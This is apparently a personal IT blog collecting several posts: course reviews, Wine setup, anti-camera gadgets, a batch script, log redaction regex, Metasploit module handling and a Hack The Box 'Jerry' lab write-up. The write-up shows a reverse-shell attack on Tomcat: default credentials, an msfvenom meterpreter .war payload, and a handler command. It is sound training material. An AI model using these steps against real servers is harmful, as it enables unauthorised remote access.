Review of Udemy course –AZ-300 Azure Architecture Technologies Certification Exam


I recently passed the AZ-300 and wanted to review some of the material I used to pass it in case anyone else is thinking of taking it and wants some advice on how to prepare.

This AZ-300 course from Scott Duffy is aimed at people wishing to take the Azure technologies exam from Microsoft, the exam itself covers a lot of high level concepts within the Azure system and aims to certify that you understand a wide variety of concepts within Azure at an architect level.

The syllabus is very broad and covers topics from networking, scaling up and out automatically, Security, Migration, Web apps and anything else you’d  expect a consultant to be able to advise on if you were planning on moving to Azure.



  • The course consists of lots of videos split into neat sections covering the entire AZ-300 syllabus
  • The videos are high quality, clearly explaining what Scott is talking about
  • The audio quality is very high
  • Scott has clearly been using Azure for years and you get the impression he is talking about a lot of the topics from experience and not just documentation.


  • This course is nowhere near enough by itself to pass the AZ-300, the exam is very in depth and asks some awkward questions which this course does not prepare you for
  • The video course is only 10.5 hours, I suspect most people will be putting in 50+ hours of prep in order to pass the exam
  • There is a lack of practical lesson which would help put the course topics into practise.


Nobody is going to be passing the exam using just this study guide by itself. As you will need to buy other materials I can’t justify recommending this video series. Instead you should take a look and find a larger and more in depth course which provides lessons/labs to go alongside the theory. It is too easy to halfheartedly nod along to these video lessons without any of the knowledge sinking in.

The course content itself is well made, there just isn’t enough of it to make it worth while. The scenarios that would justify getting this course would be if you already have bought and used a larger 30-40 hour course and want to go over the topics again from a different perspective or if you are not interested in sitting the exam but just want to see what Azure has to offer as an alternative to AWS or on premise solutions.

Buy a larger course first, then some practise labs, then one or two sets of practise exam questions, and if you still need something extra to study after that then this course is the right thing to get.

How to install Wine and Python 2.7

Wine is a tool (not an emulator) for running Windows based programs on other non-Windows based operating systems such as Linux. These are the steps to get it installed on Kali Linux with Python 2.7

First add the i386 architecture to your system in case you don’t already have it, the command won’t do anything if you have it already. Skip this first step if that is the case.


Next run apt-get update:

apt-get update

To update your repositories for Linux. This will make sure you get the latest version of Wine.


Install the Wine package using apt-get install wine32. This could take a few minutes depending on your internet connection and you will be asked to confirm the install near the start.

apt-get install wine32


Once installed you should see wine in the /root/.wine folder with a Windows C:/ structure inside it:


The next stage is to download and install Python into your Wine install. Visit the Python download page at:


and download the Windows x86 MSI Installer. The file is only 19MB in size so should come down very quickly.



Now navigate to your downloads folder in the terminal and install it using wine msiexec /i python-2.7.14.msi

wine msiexec /i python-2.7.14.msi


The install wizard should appear and unless you have some specific requirements for the install you can just hit next, next, next, finish through the windows.



Once the install is complete you can confirm it’s there by navigating to the new Python folder within the Wine directory:




Anti-Paparazzi technology part 2

The last post about Anti-Paparazzi clothing sent me down a rabbit hole finding out about other recent inventions designed to stop cameras. Here’s a brief summary of what other options exist if you cant get hold of a nifty reflective scarf:

Flash back handbag


A student named Adam Harvey invented a handbag add-on which detects a camera flash and in return flashes right back at it before the photo is taken. The result is a ruined photograph. I believe the downside is that this device is only quick enough to thwart slower shutter speeds which is good enough in you are in a dark area or out at night but won’t have much of an effect at sporting events where photographers will typically be using quicker shutter speed settings. The device is also not in commercial production but the inventor still deserves some respect for trying to beat a flash at it’s own game.

The inventors website

Write up at

Write up at

Anti photography paint

An article in the express claims that any photographs taken of Angelina Jolie giving birth are fakes because the hospital she was at coated the windows with anti-photography paint. I’m a bit dubious about this claim as the article gives no further details about how it works and google comes up short when trying to find other examples of this technology being used elsewhere.

I think this might be a bit case of the journalist taking some creative liberties and the windows of the hospital room were either coated with the same stuff as one way mirrors (suggesting the inside was kept darker than normal) or the windows simply had the same privacy filters applied that you can get for your office computer to prevent shoulder surfing:


Privacy screen from 3M

Dubious article from the Express



A decade ago there were reports of technology on Roman Abramovich’s new super boat which utilised lasers to scan in all directions and detect the CCD (Charged couple device) of a digital camera and blind it. The CCD is the part of the camera which detects light before coding the information into pixels. The lasers are able to detect these and send an extra bright beam directly at the CCD, blinding it without affecting anything else.

this technology was first developed as a way to try to stop pirates recording movies in the cinema. There is a lot of speculation (including from the devices inventor) as to how effective it is when taken outside of a small dark cinema room and stuck to the side of a giant yacht in the ocean in broad daylight. – Romans big yacht

techradar – review of the technology

Anti face recognition

There is some interesting work going into stopping facial recognition technology doing its thing. This won’t stop a paparazzi taking a direct photo of you but it might hinder any automated CCTV or video recording software which activates and focuses based on what it detects as a human face.

at CV Dazzle there is a group of make up artists designing styles which stop common facial recognition technology from being able to detect a face. It works by disguising common features which some face recognition technology relies on such as the colouring of eyes, the nose bridge or the edges of the mouth.

anti face recognition make up

The same guy mentioned previously (Adam Harvey) who works on CV Dazzle and the flash-back camera also has a project called “Hyperface” which designs patterns which instead of being detected as a non-face gets detected as hundreds of individual faces, hopefully confusing the facial recognition software and hiding your real face.

Looking at the sample designs it seems strange at how little is needed for software to detect a “face”. a very simple design of pixels which can just about pass as eyes, nose and a mouth seems to be all it takes:

facial recognition baffle


CV Dazzle – make up camouflage



Anti-Paparazzi clothing

This is probably a problem which doesn’t affect too many readers but if you want to avoid having your photo taken on a night out either by a professional photographer or a snap-happy friend with an iPhone there is a company named “Beta Brand” who makes anti-paparazzi clothing which makes photos look like this:betabrand-photobomber

The clothing itself contains lots of tiny glass spheres which act as a super reflective material which bounce back as much of the light from a flash as possible and tricking a camera into thinking the scene is a lot lighter than it really is. A lot of today’s modern cameras will auto adjust the picture settings and make everything seem darker to adjust for the mass of light it see’s coming in.

Its main downsides are that it doesn’t work if the camera isn’t using a flash or if the photographer is manually adjusting all the settings. The clothes aren’t too overpriced and look cool themselves so it’s likely that wearing them might end up attracting more attention from fans who snap a photo, check that it looks weird and suddenly get more curious as to what is going on.

You can read more about it here:

PetaPixel – Watch flashback anti-paparazzi clothing ruin flash photographs

Digitalrev – How anti paparazzi clothing works

Bored Panda – Anti paparazzi clothing chris holmes

Hack the Box Jerry

Hack The Box – Jerry – Writeup

Jerry is a retired box from HTB so can only be done if you have a premium VIP account.

It shows the risks of leaving default credentials for installed services. The solution I’ve got here is fairly standard and I’ve kept in a little of extra in terms of thought processes which didn’t go anywhere instead of just writing out how to get the flags yourself.

First step is to run an Nmap scan of the target and note that it only comes back with one port, running Apache Tomcat version 7.0.88 and Coyote JSP Engine 1.1


As it looks like a web server, we can visit the site and confirm it looks like a base install of Apache Tomcat version 7.0.88


Only thing to notice from this generic Tomcat page is a file path name. This is worth noting in case we are trying to navigate around the file system at a later point in time.


Normally this might be the time to start running a tool like dirb or dirbuster to try and find what else is available on this server however some nice links are given to us in the top right as “Server Status” “Manager App” and “Host manager”. All 3 present us with a login box if we try to access them.


As this looks like a default install of Tomcat lets check to see if the default credentials have been changed. A quick Google search reveals a Github page with about 20 default passwords listed for tomcat installs. If there were more than 20 we Could use Hydra to automate trying them however as the passwords were short and simple enough you can work through them manually very quickly.


Doing this with the Server status module yields success for the login admin:admin

There isn’t much to see on this page, the only thing which stands out is an out of date java version which isn’t directly vulnerable now but worth noting for later if we get stuck.


Trying to log into the other modules now gives a HTTP 403 authorisation error instead of the password prompt from before. This is because the site is still trying to login with the admin:admin credential from earlier and while it registers as a valid set of credentials the admin account doesn’t have authorisation to access the other modules. There is no logout option on the site so you need to clear your browser history to reset.


A different set of  default credentials from Github is successful and we can get into the Manager app using tomcat:s3cret

There is plenty of interesting info on this page but the obvious place to start looking is the upload feature. Any functionality which gives us the ability to put our own files onto a remote server and execute them is a good candidate for further investigation.


If we can get a file onto the server which executes a reverse shell and connects back to us we can use that as a foothold to get further into the system. Lets use msfvenom to help create this reverse shell in a .war format as it is most likely going to be accepted by the uploader. We know the server is sending out http traffic so as a first choice we should look at using the http reverse shell. Any protocol not blocked by the firewall is likely to work for this.


We need to edit the options in the Meterpreter shell with the details of our local machine IP and port and give it a name of dodgyfile.war

msfvenom -p windows/x64/meterpreter_reverse_http LHOST= LPORT=4567 -f war -o dodgyfile.war


The .war file is going to have a .jsp file inside with a randomised name. This is in an effort to try to disguise it from virus scanners. It’s worth making a note of the name in case we need to manually visit it later. You can view the contents of the war file using any zip tool.


Now that we have the payload we should setup our machine to start listening in case the reverse shell gets activated as soon as we complete the upload.

Setup Metasploit as the listener by opening it up and using the exploit/multi/handler and giving it a few parameters


set the local host to your network interface (Look it up using ifconfig if needed). Set the port to whatever was set in the payload previously.



Start the listener using exploit -j  (-j puts the process into the background as soon as it starts)


Back on the target website lets try and upload our dodgy file. Fingers crossed there aren’t any extra security checks which might flag up the file. (unlikely, but we won’t know util we try)


Looks like it has uploaded fine, checking the Metasploit listener it hasn’t auto-ran so we need to find out how to get it started manually.


After a bit of clicking about and trying the features on the app manager page it looks like you can manually navigate to the .jsp we noted earlier to get it to execute.


As our listener was in the background waiting it caught the incoming connection and we can interact with it using:

sessions -i 1


To make things easier to navigate use the shell command and you can start enumeration and browsing for the required flags.


Slightly disappointing that there is no privilege escalation required for this box as you start your shell as the system account by default and can go straight into the administration account. The only small challenge left is to remember how to use quotes to see the contents of a text file with spaces in its name. Both flags are in the same text file.



Review of Udemy course – The RedTeam blueprint a unique guide to ethical hacking


RedTeam Nation - Brandon Dennis - Certificate of completion
RedTeam Nation – Brandon Dennis – Certificate of completion

The Redteam blue print is a video course created by Brandon Dennis which aims to take anyone with no previous security knowledge and give them a good starting point from which to pursue a career in cyber security.

The course covers all the topics you would expect as well as a multitude of others such as the typical structure of red and blue teams, advice for applying for jobs and tips for passing the interviews.

Most courses I’ve seen in the past briefly advise learners to find a programming language they are comfortable with and take a separate course to improve their knowledge however Brandons course includes 2:30 of Python tutorials and 1:40 in Assembly. While This is only enough to cover the topics briefly it is more than enough to get someone started with either language.


Brandon himself has completed the OSCP and is studying for the OSCE. it feels like his choice of topics and how deep he goes into each topic is aimed at someone who eventually wants to commit and study for the OSCP. The course would also be useful for someone looking at the Comptia Security+ or the EC-Council CEH.


  • Far more in depth than other courses I’ve seen which claim to go to beginner –> hacker
  • Plenty of demonstrations showing the concepts discussed.
  • The course covers far more than just the technical aspect of cyber security.
  • Lots of extra resources provided with the lectures such as templates or links for further reading:
    Extra resources attached to lectures
    Extra resources attached to lectures
  • All the standard stages of a red team assignment are covered: reconnaissance, enumeration, exploit, pivoting, privilege escalation, persistence, covering tracks.
  • The teachers voice is clear and easy to understand.


  • The screen capture was recorded at a high resolution and is sometimes only visible if you have a good steady internet connection which auto connects at 1080p, for some reason you cannot manually set it to anything higher than 720p which means if you are on a weak connection you cannot see what is happening on screen:High resolution - hard to see console
  • The module regarding job hunting and salary is very specific to the USA. This isn’t Brandons fault and I wouldn’t expect him to tailor-make videos for every country but is worth noting if you are somewhere where the IT job market is very different from America.


Very indepth course and value for money if you buy it during a Udemy sale

Check the up/down status of servers and services with a batch file

Here is a template for a batch file you can run on demand to check the up/down status of servers and services using the command prompt.

Most companies will be using some sort of automated tool for monitoring the status of their servers however if you don’t have the budget or want something quick to use here is something you can setup which pings as many servers or services as you want and outputs their status to a text file which can quickly be scanned to find out if any have gone down unexpectedly.

Or maybe you pushed out a windows patch to all your machines and want to check everything has come back up after reboots?


  • Copy and Paste the below script into a text file and save it using any name but with a .bat extension
  • Place it in c:\X\       (if needed you can change this location in the script)
  • Edit the bat file and replace #SERVER and #SERVICENAME with whatever you are checking. The service name can be found in the properties 1
  • It should look like this:2
  • When you run the batch file it will output all the raw data into a file called servicestatus.txt then clean it up and place the final output into a file called FinalReport.txt which you can easily scan to see which servers either haven’t responded to ping or which services are showing as stopped.34



REM ———————–SECTION 1————————————–

REM This checker has 4 sections

REM Section 1 = Version details and notes

REM Section 2 = Pings a list of servers to ensure they are up

REM Section 3 = Contacts a list of services to ensure they are up

REM section 4 = Gets the raw output of sections 2+3 and removes unwanted lines, then outputs the results to finalreport.txt

REM ———————–SECTION 2————————————-

ping #SERVER1 >> c:/x/servicestatus.txt

ping #SERVER2 >> c:/x/servicestatus.txt

ping #SERVER3 >> c:/x/servicestatus.txt

REM ———————–SECTION 3—————————————-

sc \\#SERVER1 query #SERVICENAME >> c:/x/ServiceStatus.txt

sc \\#SERVER1 query #SERVICENAME >> c:/x/ServiceStatus.txt

sc \\#SERVER2 query #SERVICENAME >> c:/x/ServiceStatus.txt

sc \\#SERVER3 query #SERVICENAME >> c:/x/ServiceStatus.txt

sc \\#SERVER3 query #SERVICENAME >> c:/x/ServiceStatus.txt

REM ———————–SECTION 4———————————————–

findstr /v “statistics Packets Approximate Minimum TYPE WIN32 STOPPABLE SERVICE_EXIT_CODE CHECKPOINT WAIT_HINT” c:/x/servicestatus.txt > c:/x/FinalReport.txt

del “C:\X\servicestatus.txt” /f /q

Remove IP addresses from multiple log files

Log files can grow as large as you let them and if for any reason you need to redact the IP addresses they hold it’s often impractical to do it manually.

It can be automated using Notepad++ (A free text editor Notepad++ Download link) with some clever regex.

There are 2 different methods, one using simple regex which will do the job but will also remove some non-IP numbers which look similar in format to an IP address.

Quick and dirty method

Here are some demo log files with thousands of IP addresses inside:


Launch Notepad++ and select search >> find in files >>


The quick and dirty regex is : (\d{1,3}\.){3}\d{1,3}

set some replacement text or leave blank if you want to just delete the entries.

set the directory which contains your log files, and most importantly set the search mode to “regular expression”. It’s set to “Normal” by default.


When you press “Replace in Files” you’ll turn this:


Into :


As you can see it’s also gone through all of the log files and saved you a lot of manual time and effort:


Regex explained:


(\d{1,3}\.) finds any set of numbers 1-3 digits in length with a full stop at the end.

{3} repeats the previous regex 3 times.

\d{1,3} is similar to the first part and searches for a set of numbers 1-3 digits in length but with no full stop at the end.

The reason you cannot simply use (\d{1,3}\.){4} is because the last octet of an IP address doesn’t end with a full stop.

The problem with this quick regex is that it will also pick up numbers such as:

999.999.999.999 which is not a valid IP. Depending on the contents of your log files this might not be a problem.

IP Specific regex

If the quick and dirty method doesn’t do exactly what you need you can use this much longer regex to specify the numbers which can appear in an IP address:


It will do mostly the same as the previous regex but is smart enough to not remove 999.999.999.999


How to add a custom module to Metasploit

Metasploit comes with thousands of modules preinstalled but there is nothing stopping you from adding some brand new ones from the internet or altering existing ones.

Here is the method for taking an existing exploit and adding your own custom version of it to Metasploit, the same instructions can be adapted for adding a brand new exploit from the internet.

  • By default in Kali the modules are all stored in /usr/share/metasploit-framework/modules it’s worth checking yours are here before we continue.


  1. Open up msfconsole and navigate to your modules folder2
  2. In this example we will be making a custom version of the ms02_056_hello.rb mssql exploit. Use the mkdir command to create a custom folder in a sensible location and copy the exploit into it using cp.3
  3. navigate to your custom folder and confirm the exploit copy is there:4
  4. Open up the exploit using any editor (Ignore this if you don’t intend on making any changes and have found a module from the internet:5
  5. Make the changes you want. In the screenshot below we have just changed the description to as a demonstration. Save your new exploit.6
  6. Use the mv command to give your exploit a custom name, this stops you accidentally confusing it with the original code in the future.7
  7. Metasploit won’t be able to find your exploit until it after you exit and reopen msfconsole. You’ll see a search error if you try: 8
  8. After closing and reopening msfconsole your code should be visible within Metasploit to use just like the preinstalled ones.9
Happy laptop serial number

Find Lenovo serial number using WMIC


It can be very annoying to try and find the serial number of your laptop only to realise its on a little sticker somewhere inaccessible, requiring you to hunt for a screwdriver to remove a panel, or forcing you to power down to remove the battery.

If you’ve had your machine for a while its possible the numbers on it have faded or the sticker has partly come off, forcing you to play a vague form of hangman to figure it out.

The serial number isn’t something most people care about, unless the laptop gets stolen or they are trying to check warranty online. Trying to find the serial after you’ve lost your laptop isn’t going to be too successful so its recommended to find it and make a note just in case.

If you do find yourself struggling to get the serial by looking at the sticker this might save you some frustration:

  1. open up an elevated command prompt
  2. Type “Wmic bios get serialnumber” and press enter

if the serial is registered in the BIOS it should get displayed on screen. I’ve tested the command successfully on various Lenovo laptops, and both HP and Dell desktops.

If you are on a network you can query the serial of a remote machine using:

  • wmic /node:NameOfRemoteMachine bios get serialnumber

If you don’t have the correct permissions to the other machine, or have mistyped the computers name you can expect to see this error:

WMIC error for no access or incorrect computer name
WMIC error for no access or incorrect computer name

If you get unlucky and the serial isn’t in the BIOS you’ll get this error and start swearing as you head back to Google to find another method:

WMIC error for no entry in BIOS